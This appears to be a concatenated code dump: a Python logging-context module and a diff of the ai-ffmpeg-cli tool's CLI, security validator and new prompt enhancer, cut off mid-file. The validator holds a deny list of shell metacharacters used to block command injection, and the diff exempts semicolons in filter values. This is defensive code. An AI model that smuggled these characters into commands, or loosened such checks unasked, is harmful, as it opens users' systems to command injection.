_request_id: contextvars.ContextVar[str | None] = contextvars.ContextVar("request_id", default=None)
_user_id: contextvars.ContextVar[str | None] = contextvars.ContextVar("user_id", default=None)
_tenant_id: contextvars.ContextVar[str | None] = contextvars.ContextVar("tenant_id", default=None)
_custom_context: contextvars.ContextVar[dict[str, Any] | None] = contextvars.ContextVar(
    "custom_context", default=None
)


class LogContext:
    """Context manager for binding logging context."""

    def __init__(self, **kwargs: Any) -> None:
        """Initialize context with key-value pairs.

        Args:
            **kwargs: Context variables to bind
        """
        self.context_data = kwargs
        self._tokens: dict[str, contextvars.Token] = {}

    def __enter__(self) -> "LogContext":
        """Bind context variables."""
        for key, value in self.context_data.items():
            if key == "request_id":
                self._tokens[key] = _request_id.set(value)
            elif key == "user_id":
                self._tokens[key] = _user_id.set(value)
            elif key == "tenant_id":
                self._tokens[key] = _tenant_id.set(value)
            else:
                # Store custom context
                current_context = _custom_context.get() or {}
                current_context = current_context.copy()
                current_context[key] = value
                self._tokens[f"custom_{key}"] = _custom_context.set(current_context)
        return self

    def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
        """Restore context variables."""
        for key, token in self._tokens.items():
            if key.startswith("custom_"):
                _custom_context.reset(token)
            elif key == "request_id":
                _request_id.reset(token)
            elif key == "user_id":
                _user_id.reset(token)
            elif key == "tenant_id":
                _tenant_id.reset(token)


def bind_context(**kwargs: Any) -> LogContext:
    """Create a context manager for binding logging context.

    Args:
        **kwargs: Context variables to bind

    Returns:
        LogContext instance that can be used as a context manager

    Example:
        with bind_context(request_id="req-123", user_id="user-456"):
            logger.info("Processing request")
    """
    return LogContext(**kwargs)


def clear_context() -> None:
    """Clear all context variables."""
    _request_id.set(None)
    _user_id.set(None)
    _tenant_id.set(None)
    _custom_context.set(None)


def get_context() -> dict[str, Any]:
    """Get current context data.

    Returns:
        Dictionary containing current context variables
    """
    context = {}

    # Add standard context variables if set
    request_id_val = _request_id.get()
    if request_id_val is not None:
        context["request_id"] = request_id_val

    user_id_val = _user_id.get()
    if user_id_val is not None:
        context["user_id"] = user_id_val

    tenant_id_val = _tenant_id.get()
    if tenant_id_val is not None:
        context["tenant_id"] = tenant_id_val

    # Add custom context
    custom_context = _custom_context.get()
    if custom_context:
        context.update(custom_context)

    return context


def request_id(value: str) -> LogContext:
    """Create a context manager that binds request_id.

    Args:
        value: Request ID value

    Returns:
        LogContext instance

    Example:
        with request_id("req-123"):
            logger.info("Processing request")
    """
    return LogContext(request_id=value)


def user_id(value: str) -> LogContext:
    """Create a context manager that binds user_id.

    Args:
        value: User ID value

    Returns:
        LogContext instance

    Example:
        with user_id("user-456"):
            logger.info("User action")
    """
    return LogContext(user_id=value)


def tenant_id(value: str) -> LogContext:
    """Create a context manager that binds tenant_id.

    Args:
        value: Tenant ID value

    Returns:
        LogContext instance

    Example:
        with tenant_id("tenant-789"):
            logger.info("Tenant operation")
    """
    return LogContext(tenant_id=value)
@@ -1,29 +1,272 @@
|
||||
"""Main entry point for the ai-ffmpeg-cli application.
|
||||
|
||||
This module provides the CLI interface using Typer, handling both one-shot
|
||||
commands and interactive mode for natural language to ffmpeg command conversion.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import platform
|
||||
import sys
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
|
||||
import typer
|
||||
from rich import print as rprint
|
||||
from rich.console import Console
|
||||
from rich.panel import Panel
|
||||
from rich.table import Table
|
||||
from rich.text import Text
|
||||
|
||||
from .command_builder import build_commands
|
||||
from .config import AppConfig
|
||||
from .config import load_config
|
||||
from .confirm import confirm_prompt
|
||||
from .context_scanner import scan
|
||||
from .errors import BuildError
|
||||
from .errors import ConfigError
|
||||
from .errors import ExecError
|
||||
from .errors import ParseError
|
||||
from .context_scanner_basic import scan
|
||||
from .custom_exceptions import BuildError
|
||||
from .custom_exceptions import ConfigError
|
||||
from .custom_exceptions import ExecError
|
||||
from .custom_exceptions import ParseError
|
||||
from .intent_router import route_intent
|
||||
from .llm_client import LLMClient
|
||||
from .llm_client import OpenAIProvider
|
||||
from .version_info import __version__
|
||||
|
||||
# Initialize console for Rich output
|
||||
console = Console()
|
||||
|
||||
# Initialize Typer app with completion disabled and support for invocation without subcommands
|
||||
app = typer.Typer(add_completion=False, help="AI-powered ffmpeg CLI", invoke_without_command=True)
|
||||
|
||||
|
||||
def _display_welcome_screen() -> None:
|
||||
"""Display a beautiful welcome screen for the interactive mode."""
|
||||
# Create welcome panel
|
||||
welcome_text = Text()
|
||||
welcome_text.append("ai-ffmpeg-cli", style="bold white")
|
||||
welcome_text.append(" v", style="dim")
|
||||
welcome_text.append(__version__, style="bold green")
|
||||
welcome_text.append("\n\n", style="dim")
|
||||
welcome_text.append(
|
||||
"AI-powered video and audio processing with natural language", style="italic"
|
||||
)
|
||||
welcome_text.append("\n", style="dim")
|
||||
welcome_text.append(
|
||||
"Type your request in plain English and let AI handle the ffmpeg complexity!",
|
||||
style="dim",
|
||||
)
|
||||
|
||||
welcome_panel = Panel(
|
||||
welcome_text,
|
||||
title="[bold cyan]Welcome to Interactive Mode[/bold cyan]",
|
||||
border_style="blue",
|
||||
padding=(1, 2),
|
||||
)
|
||||
|
||||
console.print(welcome_panel)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_system_info() -> None:
|
||||
"""Display system information in a table format."""
|
||||
table = Table(title="[bold cyan]System Information[/bold cyan]", show_header=False, box=None)
|
||||
table.add_column("Property", style="bold blue")
|
||||
table.add_column("Value", style="white")
|
||||
|
||||
table.add_row(
|
||||
"Python Version",
|
||||
f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}",
|
||||
)
|
||||
table.add_row("Platform", platform.platform())
|
||||
table.add_row("CLI Version", __version__)
|
||||
table.add_row("Start Time", datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
|
||||
|
||||
console.print(table)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_context_info(context: dict, output_dir: Path | None = None) -> None:
|
||||
"""Display context information in a beautiful table format."""
|
||||
if not context:
|
||||
return
|
||||
|
||||
# Create context table
|
||||
table = Table(title="[bold green]Available Media Files[/bold green]", show_header=True)
|
||||
table.add_column("Type", style="bold cyan", justify="center")
|
||||
table.add_column("Count", style="bold green", justify="center")
|
||||
table.add_column("Files", style="white")
|
||||
|
||||
# Add video files
|
||||
videos = context.get("videos", [])
|
||||
if videos:
|
||||
video_files = "\n".join([f"• {Path(v).name}" for v in videos[:5]]) # Show first 5
|
||||
if len(videos) > 5:
|
||||
video_files += f"\n• ... and {len(videos) - 5} more"
|
||||
table.add_row("Videos", str(len(videos)), video_files)
|
||||
|
||||
# Add audio files
|
||||
audios = context.get("audios", [])
|
||||
if audios:
|
||||
audio_files = "\n".join([f"• {Path(a).name}" for a in audios[:5]]) # Show first 5
|
||||
if len(audios) > 5:
|
||||
audio_files += f"\n• ... and {len(audios) - 5} more"
|
||||
table.add_row("Audio", str(len(audios)), audio_files)
|
||||
|
||||
# Add image files
|
||||
images = context.get("images", [])
|
||||
if images:
|
||||
image_files = "\n".join([f"• {Path(i).name}" for i in images[:5]]) # Show first 5
|
||||
if len(images) > 5:
|
||||
image_files += f"\n• ... and {len(images) - 5} more"
|
||||
table.add_row("Images", str(len(images)), image_files)
|
||||
|
||||
# Show most recent video if available
|
||||
most_recent = context.get("most_recent_video")
|
||||
if most_recent:
|
||||
table.add_row("Recent", "1", f"• {Path(most_recent).name}")
|
||||
|
||||
if table.row_count > 0:
|
||||
console.print(table)
|
||||
console.print()
|
||||
|
||||
# Show output directory information if provided
|
||||
if output_dir:
|
||||
output_info = Panel(
|
||||
f"[bold]Output Directory:[/bold] {output_dir}\n"
|
||||
f"[dim]Generated files will be saved here[/dim]",
|
||||
            title="[bold blue]Output Configuration[/bold blue]",
            border_style="blue",
        )
        console.print(output_info)
        console.print()


def _display_completion_summary(output_dir: Path | None = None) -> None:
    """Display a summary of available media files after completion."""
    if not output_dir:
        return

    try:
        # Scan the output directory for new media files
        from .context_scanner_basic import scan

        # Create a temporary context for the output directory
        output_context = scan(cwd=output_dir, show_summary=False)

        if not output_context:
            return

        # Create completion summary table
        completion_table = Table(
            title="[bold green]Generated Output Files[/bold green]", show_header=True
        )
        completion_table.add_column("Type", style="bold cyan", justify="center")
        completion_table.add_column("Count", style="bold green", justify="center")
        completion_table.add_column("Files", style="white")

        # Add generated video files
        videos = output_context.get("videos", [])
        if videos and isinstance(videos, list):
            video_files = "\n".join([f"• {Path(str(v)).name}" for v in videos[:5]])
            if len(videos) > 5:
                video_files += f"\n• ... and {len(videos) - 5} more"
            completion_table.add_row("Videos", str(len(videos)), video_files)

        # Add generated audio files
        audios = output_context.get("audios", [])
        if audios and isinstance(audios, list):
            audio_files = "\n".join([f"• {Path(str(a)).name}" for a in audios[:5]])
            if len(audios) > 5:
                audio_files += f"\n• ... and {len(audios) - 5} more"
            completion_table.add_row("Audio", str(len(audios)), audio_files)

        # Add generated image files
        images = output_context.get("images", [])
        if images and isinstance(images, list):
            image_files = "\n".join([f"• {Path(str(i)).name}" for i in images[:5]])
            if len(images) > 5:
                image_files += f"\n• ... and {len(images) - 5} more"
            completion_table.add_row("Images", str(len(images)), image_files)

        if completion_table.row_count > 0:
            console.print(completion_table)
            console.print()

    except Exception:
        # Silently handle any errors in completion summary
        pass

def _display_config_status(cfg: AppConfig) -> None:
    """Display configuration status in a table format."""
    table = Table(
        title="[bold yellow]Configuration Status[/bold yellow]",
        show_header=False,
        box=None,
    )
    table.add_column("Setting", style="bold blue")
    table.add_column("Value", style="white")

    # Model information
    table.add_row("AI Model", cfg.model)

    # API key status
    api_key_status = "Configured" if cfg.openai_api_key else "Not configured"
    table.add_row("API Key", api_key_status)

    # Other settings
    table.add_row("Timeout", f"{cfg.timeout_seconds}s")
    table.add_row("Dry Run", "Enabled" if cfg.dry_run else "Disabled")
    table.add_row("Confirm Default", "Yes" if cfg.confirm_default else "No")

    console.print(table)
    console.print()

def _display_help_tips() -> None:
    """Display helpful tips for users."""
    tips = [
        "Try: 'convert video.mp4 to webm format'",
        "Try: 'extract audio from video.mp4'",
        "Try: 'resize video to 720p'",
        "Try: 'add subtitles to video.mp4'",
        "Type 'exit' or 'quit' to leave interactive mode",
        "Use Ctrl+C to cancel any operation",
    ]

    tip_text = Text()
    tip_text.append("Quick Tips:", style="bold white")
    tip_text.append("\n", style="dim")

    for tip in tips:
        tip_text.append(f"  {tip}\n", style="dim")

    tip_panel = Panel(
        tip_text,
        title="[bold yellow]Quick Tips[/bold yellow]",
        border_style="yellow",
        padding=(1, 2),
    )

    console.print(tip_panel)
    console.print()

def _setup_logging(verbose: bool) -> None:
    """Configure logging based on verbosity level.

    Sets up Rich-based logging configuration with appropriate level and format
    for the application.

    Args:
        verbose: If True, enables DEBUG level logging; otherwise uses INFO level
    """
    from .logging_config.config import log_startup_info
    from .logging_config.config import setup_logging as setup_rich_logging

    level = logging.DEBUG if verbose else logging.INFO
    logging.basicConfig(level=level, format="%(levelname)s: %(message)s")
    setup_rich_logging(level=level, console_instance=console)
    log_startup_info()

def _main_impl(
@@ -34,29 +277,53 @@ def _main_impl(
    dry_run: bool | None,
    timeout: int,
    verbose: bool,
    output_dir: str | None,
) -> None:
    """Initialize global options and optionally run one-shot prompt."""
    """Initialize global options and optionally run one-shot prompt.

    Core implementation function that handles configuration loading,
    context setup, and either executes a one-shot command or enters
    interactive mode.

    Args:
        ctx: Typer context object (may be None for programmatic calls)
        prompt: Natural language prompt for one-shot execution
        yes: Whether to skip confirmation prompts
        model: LLM model override
        dry_run: Whether to only preview commands without execution
        timeout: LLM timeout in seconds
        verbose: Whether to enable verbose logging

    Raises:
        typer.Exit: On successful completion or error conditions
        ConfigError: When configuration loading fails
    """
    _setup_logging(verbose)
    try:
        # Load and validate configuration
        cfg = load_config()
        if model:
            cfg.model = model
        if dry_run is not None:
            cfg.dry_run = dry_run
        if output_dir:
            cfg.output_directory = output_dir
        cfg.timeout_seconds = timeout

        # Store configuration in context for subcommands
        if ctx is not None:
            ctx.obj = {"config": cfg, "assume_yes": yes}

        # One-shot if a prompt is passed to the top-level
        # Determine if this is a one-shot invocation (no subcommand specified)
        invoked_none = (ctx is None) or (ctx.invoked_subcommand is None)
        if invoked_none:
            if prompt is not None:
                try:
                    context = scan()
                    # Execute one-shot command: scan context, parse intent, build and execute
                    context = scan(show_summary=False)  # Don't show summary for one-shot commands
                    client = _make_llm(cfg)
                    intent = client.parse(prompt, context, timeout=cfg.timeout_seconds)
                    plan = route_intent(intent)
                    plan = route_intent(intent, output_dir=Path(cfg.output_directory))
                    commands = build_commands(plan, assume_yes=yes)
                    from .executor import preview
                    from .executor import run
@@ -74,18 +341,19 @@ def _main_impl(
                        dry_run=cfg.dry_run,
                        show_preview=False,
                        assume_yes=yes,
                        output_dir=Path(cfg.output_directory),
                    )
                    raise typer.Exit(code)
                except (ParseError, BuildError, ExecError) as e:
                    rprint(f"[red]Error:[/red] {e}")
                    console.print(f"[red]❌ Error:[/red] {e}")
                    raise typer.Exit(1) from e
            else:
                # No subcommand and no prompt: enter NL interactive mode
                # No subcommand and no prompt: enter interactive mode
                if ctx is not None:
                    nl(ctx=ctx, prompt=None)
                return
    except ConfigError as e:
        rprint(f"[red]Error:[/red] {e}")
        console.print(f"[red]❌ Configuration Error:[/red] {e}")
        raise typer.Exit(1) from e

@@ -100,8 +368,16 @@ def cli_main(
    dry_run: bool = typer.Option(None, "--dry-run/--no-dry-run", help="Preview only"),
    timeout: int = typer.Option(60, "--timeout", help="LLM timeout seconds"),
    verbose: bool = typer.Option(False, "--verbose", help="Verbose logging"),
    output_dir: str | None = typer.Option(
        None, "--output-dir", help="Output directory for generated files"
    ),
) -> None:
    _main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose)
    """Main CLI entry point with global options.

    Handles the top-level command line interface, setting up global options
    and delegating to the main implementation.
    """
    _main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose, output_dir)

def main(
@@ -112,19 +388,47 @@ def main(
    dry_run: bool | None = None,
    timeout: int = 60,
    verbose: bool = False,
    output_dir: str | None = None,
) -> None:
    _main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose)
    """Programmatic entry point for the application.

    Allows the application to be used programmatically without CLI arguments.
    Useful for testing and integration scenarios.

    Args:
        ctx: Optional Typer context
        prompt: Natural language prompt
        yes: Skip confirmation prompts
        model: LLM model override
        dry_run: Preview only mode
        timeout: LLM timeout in seconds
        verbose: Enable verbose logging
    """
    _main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose, output_dir)

def _make_llm(cfg: AppConfig) -> LLMClient:
    """Create LLM client with secure API key handling."""
    """Create LLM client with secure API key handling.

    Initializes the LLM client with proper API key validation and
    provider configuration.

    Args:
        cfg: Application configuration containing API key and model settings

    Returns:
        Configured LLM client instance

    Raises:
        ConfigError: When API key is invalid or missing
    """
    try:
        # This will validate the API key format and presence
        api_key = cfg.get_api_key_for_client()
        provider = OpenAIProvider(api_key=api_key, model=cfg.model)
        return LLMClient(provider)
    except ConfigError:
        # Re-raise config errors
        # Re-raise config errors for proper error handling
        raise

@@ -133,19 +437,50 @@ def nl(
    ctx: typer.Context,
    prompt: str | None = typer.Argument(None, help="Natural language prompt"),
) -> None:
    """Translate NL to ffmpeg, preview, confirm, and execute."""
    """Translate NL to ffmpeg, preview, confirm, and execute.

    Core command that handles natural language to ffmpeg command conversion.
    Supports both single command execution and interactive mode.

    Args:
        ctx: Typer context containing configuration
        prompt: Optional natural language prompt for single execution

    Raises:
        typer.Exit: On completion or error conditions
    """
    obj = ctx.obj or {}
    cfg: AppConfig = obj["config"]
    assume_yes: bool = obj["assume_yes"]

    try:
        context = scan()
        # Initialize context and LLM client
        context = scan(
            show_summary=False
        )  # Don't show summary in interactive mode as it's shown separately
        client = _make_llm(cfg)

        def handle_one(p: str) -> int:
            """Process a single natural language prompt.

            Parses the prompt, builds commands, shows preview, and executes
            if confirmed.

            Args:
                p: Natural language prompt to process

            Returns:
                Exit code from command execution
            """
            intent = client.parse(p, context, timeout=cfg.timeout_seconds)
            plan = route_intent(intent)
            plan = route_intent(intent, output_dir=Path(cfg.output_directory))
            commands = build_commands(plan, assume_yes=assume_yes)

            # Always show preview before asking for confirmation
            from .executor import preview

            preview(commands)

            confirmed = (
                True
                if assume_yes
@@ -156,32 +491,46 @@ def nl(
                from .executor import run

                return_code = run(
                    commands, confirm=True, dry_run=cfg.dry_run, assume_yes=assume_yes
                    commands,
                    confirm=True,
                    dry_run=cfg.dry_run,
                    show_preview=False,
                    assume_yes=assume_yes,
                    output_dir=Path(cfg.output_directory),
                )
            else:
                from .executor import preview

                preview(commands)
            return return_code

        if prompt:
            # Single command execution
            code = handle_one(prompt)
            raise typer.Exit(code)
        else:
            rprint("[bold]aiclip[/bold] interactive mode. Type 'exit' to quit.")
            # Interactive mode with enhanced UI
            _display_welcome_screen()
            _display_system_info()
            _display_context_info(context, Path(cfg.output_directory))
            _display_config_status(cfg)
            _display_help_tips()

            console.print("[bold cyan]Ready for your commands![/bold cyan]")
            console.print()

            while True:
                try:
                    line = input("> ").strip()
                    line = console.input("[bold green]aiclip>[/bold green] ").strip()
                except EOFError:
                    # Handle Ctrl+D gracefully
                    console.print("\n[yellow]Goodbye![/yellow]")
                    break
                if not line or line.lower() in {"exit", "quit"}:
                    console.print("[yellow]Goodbye![/yellow]")
                    break
                try:
                    handle_one(line)
                except (ParseError, BuildError, ExecError) as e:
                    rprint(f"[red]Error:[/red] {e}")
                    console.print(f"[red]❌ Error:[/red] {e}")
    except (ConfigError, ParseError, BuildError, ExecError) as e:
        rprint(f"[red]Error:[/red] {e}")
        console.print(f"[red]❌ Error:[/red] {e}")
        raise typer.Exit(1) from e

@@ -190,10 +539,115 @@ def nl(
def explain(
    ffmpeg_command: str | None = typer.Argument(None, help="Existing ffmpeg command to explain"),
) -> None:
    """Explain an existing ffmpeg command in natural language.

    Placeholder for future feature to reverse-engineer ffmpeg commands
    into human-readable explanations.

    Args:
        ffmpeg_command: The ffmpeg command to explain

    Raises:
        typer.Exit: When no command is provided or feature is not implemented
    """
    if not ffmpeg_command:
        rprint("Provide an ffmpeg command to explain.")
        console.print("[red]❌ Error:[/red] Provide an ffmpeg command to explain.")
        raise typer.Exit(2)
    rprint("Explanation is not implemented in MVP.")
    console.print("[yellow]⚠️ Warning:[/yellow] Explanation is not implemented in MVP.")

@app.command()
def enhance(
    prompt: str = typer.Argument(..., help="User prompt to enhance and analyze"),
    show_suggestions: bool = typer.Option(
        True, "--suggestions/--no-suggestions", help="Show improvement suggestions"
    ),
) -> None:
    """Enhance and analyze a user prompt for better LLM understanding.

    Uses the prompt enhancer to improve user input and provides suggestions
    for better prompt writing.

    Args:
        prompt: User prompt to enhance and analyze
        show_suggestions: Whether to display improvement suggestions

    Raises:
        typer.Exit: On error conditions
    """
    try:
        from .context_scanner_basic import scan
        from .prompt_enhancer import enhance_user_prompt
        from .prompt_enhancer import get_prompt_suggestions

        # Enhance the prompt using context-aware processing
        context = scan()

        enhanced = enhance_user_prompt(prompt, context)

        # Display original and enhanced prompts in a panel
        prompt_panel = Panel(
            f"[bold]Original:[/bold] {prompt}\n\n[bold]Enhanced:[/bold] {enhanced}",
            title="[bold green]Prompt Enhancement[/bold green]",
            border_style="green",
        )
        console.print(prompt_panel)

        # Show improvement suggestions if requested
        if show_suggestions:
            suggestions = get_prompt_suggestions(prompt)
            if suggestions:
                suggestion_table = Table(title="[bold yellow]Improvement Suggestions[/bold yellow]")
                suggestion_table.add_column("#", style="bold cyan", justify="center")
                suggestion_table.add_column("Suggestion", style="white")

                for i, suggestion in enumerate(suggestions, 1):
                    suggestion_table.add_row(str(i), suggestion)

                console.print(suggestion_table)
            else:
                console.print("\n[green]Prompt looks good![/green]")

        # Display available file context information in a table
        context_table = Table(title="[bold blue]Available Files[/bold blue]")
        context_table.add_column("Type", style="bold cyan", justify="center")
        context_table.add_column("Count", style="bold green", justify="center")
        context_table.add_column("Details", style="white")

        videos = context.get("videos")
        if videos and isinstance(videos, list):
            most_recent = context.get("most_recent_video")
            most_recent_name = Path(str(most_recent)).name if most_recent else "None"
            context_table.add_row(
                "Videos",
                str(len(videos)),
                f"Most recent: {most_recent_name}",
            )

        audios = context.get("audios")
        if audios and isinstance(audios, list):
            audio_names = [Path(str(a)).name for a in audios[:3]]
            context_table.add_row(
                "Audio",
                str(len(audios)),
                f"Files: {', '.join(audio_names)}",
            )

        subtitle_files = context.get("subtitle_files")
        if subtitle_files and isinstance(subtitle_files, list):
            subtitle_names = [Path(str(s)).name for s in subtitle_files[:3]]
            context_table.add_row(
                "Subtitles",
                str(len(subtitle_files)),
                f"Files: {', '.join(subtitle_names)}",
            )

        if context_table.row_count > 0:
            console.print(context_table)

    except Exception as e:
        console.print(f"[red]❌ Error:[/red] {e}")
        raise typer.Exit(1) from e


if __name__ == "__main__":

@@ -29,7 +29,9 @@ if TYPE_CHECKING:
    from collections.abc import Iterable


def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None) -> list[Path]:
def expand_globs(
    patterns: Iterable[str], allowed_dirs: list[Path] | None = None
) -> list[Path]:
    """Expand glob patterns safely with comprehensive path validation.

    Expands glob patterns while ensuring all resulting paths are safe and
@@ -186,7 +188,9 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
        return False

    # Additional check for single character paths that could be roots
    if len(original_str.strip()) <= 3 and any(c in original_str for c in ["/", "\\"]):
    if len(original_str.strip()) <= 3 and any(
        c in original_str for c in ["/", "\\"]
    ):
        return False

    # Detect path traversal attempts in path components
@@ -212,7 +216,10 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
    path_lower = path_str.lower()
    for pattern in dangerous_patterns:
        try:
            if path_str.startswith(pattern) or Path(pattern).resolve() in resolved_path.parents:
            if (
                path_str.startswith(pattern)
                or Path(pattern).resolve() in resolved_path.parents
            ):
                return False
        except (OSError, ValueError):
            # If we can't resolve the pattern, check string matching
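The containment test reflowed in the hunk above can be exercised in isolation. A minimal sketch, assuming a hypothetical helper name (`under_dangerous_root` is illustrative and not part of this diff):

```python
# Illustrative sketch of the parent-containment check: a candidate path is
# rejected when a dangerous root resolves to one of its ancestor directories.
from pathlib import Path


def under_dangerous_root(path_str: str, dangerous_roots: list[str]) -> bool:
    resolved = Path(path_str).resolve()
    # Path.parents holds every ancestor directory of the resolved path
    return any(Path(root).resolve() in resolved.parents for root in dangerous_roots)
```

Using `Path.parents` rather than string prefix matching avoids false positives such as `/etcetera` matching `/etc`.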
@@ -395,6 +402,8 @@ ALLOWED_FFMPEG_FLAGS = {
    "-s",
    "-vframes",
    "-vn",
    "-frame_pts",
    "-frame_pkt_pts",
    # Audio codecs and options
    "-c:a",
    "-acodec",
@@ -474,9 +483,8 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
        return False

    # Check for dangerous patterns that could cause command injection
    cmd_str = " ".join(cmd)
    # Note: semicolons are allowed in filter values (e.g., filter chains)
    dangerous_patterns = [
        ";",
        "|",
        "&",
        "&&",
@@ -493,9 +501,33 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
        "\r",  # Line breaks
    ]

    for pattern in dangerous_patterns:
        if pattern in cmd_str:
            return False
    # Check for dangerous patterns, but allow semicolons in filter values
    for i, arg in enumerate(cmd):
        # Check if this is a filter value (follows a filter flag)
        is_filter_value = (
            i > 0
            and cmd[i - 1].startswith("-")
            and cmd[i - 1]
            in [
                "-vf",
                "-filter:v",
                "-af",
                "-filter:a",
                "-filter_complex",
                "-lavfi",
            ]
        )

        if is_filter_value:
            # Skip semicolon validation for filter values, but check other patterns
            patterns_to_check = [p for p in dangerous_patterns if p != ";"]
        else:
            # Check all dangerous patterns including semicolons for non-filter values
            patterns_to_check = dangerous_patterns + [";"]

        for pattern in patterns_to_check:
            if pattern in arg:
                return False

    # Validate flags and arguments
    i = 1  # Skip 'ffmpeg'
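The per-argument semicolon rule introduced above can be sketched standalone. This is a reduced illustration (assumed helper names and a trimmed pattern list, not the project's actual module): semicolons are rejected everywhere except in values following a filter flag, where they legitimately separate filter chains.

```python
# Minimal sketch of the semicolon-in-filter-values rule.
FILTER_FLAGS = {"-vf", "-filter:v", "-af", "-filter:a", "-filter_complex", "-lavfi"}
DANGEROUS = ["|", "&", "&&", "$", "`", "\n", "\r"]  # reduced subset for illustration


def is_arg_safe(cmd: list[str], i: int) -> bool:
    arg = cmd[i]
    # A filter value directly follows one of the recognized filter flags
    is_filter_value = i > 0 and cmd[i - 1] in FILTER_FLAGS
    patterns = DANGEROUS if is_filter_value else DANGEROUS + [";"]
    return not any(p in arg for p in patterns)


def validate(cmd: list[str]) -> bool:
    # Skip argv[0] ("ffmpeg") and check every remaining argument
    return all(is_arg_safe(cmd, i) for i in range(1, len(cmd)))
```

Checking per argument rather than over the joined command string is what makes the exemption precise: a semicolon inside `-vf scale=1280:-2;fps=30` passes, while one smuggled into an input path still fails.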
src/ai_ffmpeg_cli/prompt_enhancer.py | 371 (new file)
@@ -0,0 +1,371 @@
|
||||
"""Prompt enhancement utilities for ai-ffmpeg-cli.
|
||||
|
||||
This module provides utilities to enhance and normalize user prompts
|
||||
before sending them to the LLM, improving the accuracy and consistency
|
||||
of generated ffmpeg commands.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
from typing import Any
|
||||
|
||||
|
||||
class PromptEnhancer:
|
||||
"""Enhances user prompts to improve LLM command generation accuracy.
|
||||
|
||||
This class applies pattern matching and context-aware enhancements
|
||||
to normalize user input and add missing technical details that help
|
||||
the LLM generate more accurate ffmpeg commands.
|
||||
"""
|
||||
|
||||
def __init__(self) -> None:
|
||||
"""Initialize the prompt enhancer with predefined pattern mappings.
|
||||
|
||||
Sets up regex patterns for common user expressions and their
|
||||
enhanced equivalents, along with file extension mappings for
|
||||
context-aware processing.
|
||||
"""
|
||||
# Common patterns and their enhanced versions
|
||||
self.patterns = [
|
||||
# Aspect ratio patterns
|
||||
(
|
||||
r"\b(?:make|convert|resize|scale)\s+(?:to\s+)?(\d+):(\d+)\s+(?:aspect\s+)?ratio\b",
|
||||
r"convert to \1:\2 aspect ratio",
|
||||
),
|
||||
(r"\b(\d+):(\d+)\s+(?:aspect\s+)?ratio\b", r"\1:\2 aspect ratio"),
|
||||
# Resolution patterns
|
||||
(r"\b(\d{3,4})[xX](\d{3,4})\b", r"\1x\2 resolution"),
|
||||
(r"\b(\d{3,4})p\b", r"\1p resolution"),
|
||||
# Social media platform patterns
|
||||
(
|
||||
r"\b(?:for\s+)?(?:Instagram|IG)\s+(?:Reels?|Stories?|Posts?)\b",
|
||||
r"for Instagram Reels (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:TikTok|Tik\s+Tok)\b",
|
||||
r"for TikTok (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:YouTube|YT)\s+(?:Shorts?)\b",
|
||||
r"for YouTube Shorts (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:YouTube|YT)\s+(?:videos?)\b",
|
||||
r"for YouTube videos (16:9 aspect ratio, 1920x1080)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:Twitter|X)\s+(?:videos?)\b",
|
||||
r"for Twitter videos (16:9 aspect ratio, 1920x1080)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:Facebook|FB)\s+(?:videos?)\b",
|
||||
r"for Facebook videos (16:9 aspect ratio, 1920x1080)",
|
||||
),
|
||||
# Quality patterns
|
||||
(r"\b(?:high|good|better)\s+quality\b", r"high quality (lower CRF value)"),
|
||||
(
|
||||
r"\b(?:low|small|compressed)\s+(?:file\s+)?size\b",
|
||||
r"small file size (higher CRF value)",
|
||||
),
|
||||
(r"\b(?:compress|reduce\s+size)\b", r"compress for smaller file size"),
|
||||
# Audio patterns
|
||||
(r"\b(?:remove|delete|strip)\s+audio\b", r"remove audio track"),
|
||||
(r"\b(?:extract|get)\s+audio\b", r"extract audio to separate file"),
|
||||
(r"\b(?:mute|silence)\b", r"remove audio track"),
|
||||
# Video patterns
|
||||
(
|
||||
r"\b(?:trim|cut)\s+(?:from|at)\s+(\d+(?:\.\d+)?)\s+(?:to|until)\s+(\d+(?:\.\d+)?)\b",
|
||||
r"trim from \1 seconds to \2 seconds",
|
||||
),
|
||||
(
|
||||
r"\b(?:trim|cut)\s+(?:from|at)\s+(\d+:\d+:\d+(?:\.\d+)?)\s+(?:to|until)\s+(\d+:\d+:\d+(?:\.\d+)?)\b",
|
||||
r"trim from \1 to \2",
|
||||
),
|
||||
(r"\b(?:speed\s+up|fast|faster)\b", r"increase playback speed"),
|
||||
(r"\b(?:slow\s+down|slow|slower)\b", r"decrease playback speed"),
|
||||
# Subtitle patterns
|
||||
(
|
||||
r"\b(?:add|burn|embed)\s+(?:captions?|subtitles?)\b",
|
||||
r"burn in subtitles",
|
||||
),
|
||||
(
|
||||
r"\b(?:hardcode|hard\s+code)\s+(?:captions?|subtitles?)\b",
|
||||
r"burn in subtitles",
|
||||
),
|
||||
(r"\b(?:soft\s+)?subtitles?\b", r"subtitles"),
|
||||
# Format patterns
|
||||
(
|
||||
r"\b(?:convert\s+to|save\s+as)\s+(mp4|avi|mov|mkv|webm)\b",
|
||||
r"convert to \1 format",
|
||||
),
|
||||
# Common shortcuts
|
||||
(
|
||||
r"\b(?:make\s+it\s+)?vertical\b",
|
||||
r"convert to 9:16 aspect ratio (vertical)",
|
||||
),
|
||||
(
|
||||
